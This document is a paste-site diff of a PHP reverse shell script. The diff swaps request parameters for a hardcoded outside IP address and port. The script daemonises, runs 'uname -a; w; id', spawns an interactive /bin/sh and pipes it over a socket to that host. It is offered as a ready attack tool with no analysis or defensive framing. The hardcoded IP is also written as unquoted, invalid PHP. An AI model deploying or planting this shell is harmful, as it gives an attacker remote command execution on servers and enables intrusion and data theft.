SHOW:
|
|
- or go back to the newest paste.
| 1 | <?php | |
| 2 | ||
| 3 | set_time_limit (0); | |
| 4 | $VERSION = "1.0"; | |
| 5 | - | $ip = $_GET['ip']; |
| 5 | + | $ip = 18.223.41.243; |
| 6 | - | $port = $_GET['port']; |
| 6 | + | $port = 18808; |
| 7 | $chunk_size = 1400; | |
| 8 | $write_a = null; | |
| 9 | $error_a = null; | |
| 10 | $shell = 'uname -a; w; id; /bin/sh -i'; | |
| 11 | $daemon = 0; | |
| 12 | $debug = 0; | |
| 13 | ||
| 14 | if (function_exists('pcntl_fork')) {
| |
| 15 | $pid = pcntl_fork(); | |
| 16 | if ($pid == -1) {
| |
| 17 | printit("ERROR: Can't fork");
| |
| 18 | exit(1); | |
| 19 | } | |
| 20 | if ($pid) {
| |
| 21 | exit(0); // Parent exits | |
| 22 | } | |
| 23 | ||
| 24 | if (posix_setsid() == -1) {
| |
| 25 | printit("Error: Can't setsid()");
| |
| 26 | exit(1); | |
| 27 | } | |
| 28 | ||
| 29 | $daemon = 1; | |
| 30 | } else {
| |
| 31 | printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
| |
| 32 | } | |
| 33 | ||
| 34 | chdir("/");
| |
| 35 | umask(0); | |
| 36 | ||
| 37 | $sock = fsockopen($ip, $port, $errno, $errstr, 30); | |
| 38 | if (!$sock) {
| |
| 39 | printit("$errstr ($errno)");
| |
| 40 | exit(1); | |
| 41 | } | |
| 42 | $descriptorspec = array( | |
| 43 | 0 => array("pipe", "r"), // stdin is a pipe that the child will read from
| |
| 44 | 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
| |
| 45 | 2 => array("pipe", "w") // stderr is a pipe that the child will write to
| |
| 46 | ); | |
| 47 | ||
| 48 | $process = proc_open($shell, $descriptorspec, $pipes); | |
| 49 | ||
| 50 | if (!is_resource($process)) {
| |
| 51 | printit("ERROR: Can't spawn shell");
| |
| 52 | exit(1); | |
| 53 | } | |
| 54 | ||
| 55 | stream_set_blocking($pipes[0], 0); | |
| 56 | stream_set_blocking($pipes[1], 0); | |
| 57 | stream_set_blocking($pipes[2], 0); | |
| 58 | stream_set_blocking($sock, 0); | |
| 59 | ||
| 60 | printit("Successfully opened reverse shell to $ip:$port");
| |
| 61 | while (1) {
| |
| 62 | if (feof($sock)) {
| |
| 63 | printit("ERROR: Shell connection terminated");
| |
| 64 | break; | |
| 65 | } | |
| 66 | if (feof($pipes[1])) {
| |
| 67 | printit("ERROR: Shell process terminated");
| |
| 68 | break; | |
| 69 | } | |
| 70 | $read_a = array($sock, $pipes[1], $pipes[2]); | |
| 71 | $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); | |
| 72 | if (in_array($sock, $read_a)) {
| |
| 73 | if ($debug) printit("SOCK READ");
| |
| 74 | $input = fread($sock, $chunk_size); | |
| 75 | if ($debug) printit("SOCK: $input");
| |
| 76 | fwrite($pipes[0], $input); | |
| 77 | } | |
| 78 | if (in_array($pipes[1], $read_a)) {
| |
| 79 | if ($debug) printit("STDOUT READ");
| |
| 80 | $input = fread($pipes[1], $chunk_size); | |
| 81 | if ($debug) printit("STDOUT: $input");
| |
| 82 | fwrite($sock, $input); | |
| 83 | } | |
| 84 | if (in_array($pipes[2], $read_a)) {
| |
| 85 | if ($debug) printit("STDERR READ");
| |
| 86 | $input = fread($pipes[2], $chunk_size); | |
| 87 | if ($debug) printit("STDERR: $input");
| |
| 88 | fwrite($sock, $input); | |
| 89 | } | |
| 90 | } | |
| 91 | ||
| 92 | fclose($sock); | |
| 93 | fclose($pipes[0]); | |
| 94 | fclose($pipes[1]); | |
| 95 | fclose($pipes[2]); | |
| 96 | proc_close($process); | |
| 97 | ||
| 98 | function printit ($string) {
| |
| 99 | if (!$daemon) {
| |
| 100 | print "$string\n"; | |
| 101 | } | |
| 102 | } | |
| 103 | ?> |
